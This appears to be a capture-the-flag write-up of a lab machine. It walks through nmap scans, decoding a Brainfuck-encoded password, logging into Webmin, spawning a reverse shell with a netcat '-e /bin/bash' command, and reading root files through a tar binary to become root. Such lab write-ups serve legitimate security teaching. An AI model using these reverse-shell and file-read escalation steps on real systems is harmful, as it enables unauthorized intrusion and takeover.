first enumeration with nmap
# Nmap 7.94 scan initiated Sat Aug 26 16:57:19 2023 as: nmap -p- --min-rate 1000 -oN fulltcp.txt -v -Pn 192.168.224.238
Nmap scan report for 192.168.224.238
Host is up (0.14s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Aug 26 16:58:40 2023 -- 1 IP address (1 host up) scanned in 81.77 seconds
first run full port scan to know what ports are open, let’s run nmap default script to know what services are running on those port.
# Nmap 7.94 scan initiated Sat Aug 26 17:01:43 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 80,139,445,10000,20000 -Pn 192.168.224.238
Nmap scan report for 192.168.224.238
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-08-26T16:01:57
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 26 17:02:28 2023 -- 1 IP address (1 host up) scanned in 45.39 seconds
cool we now know what services are running on those ports.
Noticed a web server running on port 80, opening it on a browser, we got a default apache webpage.
checking the source code, we can see a text encoded in brainfuck encryption.
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
let’s decode it
decoded the text using decode. we got .2uqPEfj3D<P'a-3. let’s enumerate further.
noticed another web server on port 10000 opening it on a browser, we got redirected to a webmin login page, remember we got a potential password earlier, tried to login admin and using the decoded text as password, it failed.
another webmin server is running on port 20000 tried to login using the same creds as earlier, failed. 🤔 let’s enumerate harder. let shoot enum4linux to get available users so as to do a username enumeration on the login page.
running enum4linux -a $IP we got to see a unix user cyber. let’s try to login the webmin server using this username and the potential password from earlier.
Bankai!!! 🔥 we are able to login to the webmin server on port 20000 using cred cyber:.2uqPEfj3D<P'a-3. let’s play around and find a way to get shell.
clicking on the terminal button, we got into a terminal we can run shell commands on. let’s spawn a reverse shell.
spawned a reverse shell using /bin/nc -e /bin/bash $IP $port
Privilege Escalation
In the home directory of user cyber we can see a binary tar. 🤔 it is not an suid, let’s see what we can do with this.
checking gtfobins, we can see that we can read files. 🤔 hmmmmmm
we could read root files without being root using this binary. 🤔 let’s try read root .bash_history file and see if we can loot anything.
There’s a file named .old_pass.bak and it is only owned by root, let’s check it content since we can read root files.
checking the content of the file, we got a password, su root using the password and boom we are root.
We broke out of the shell 😜 Interesting yeah?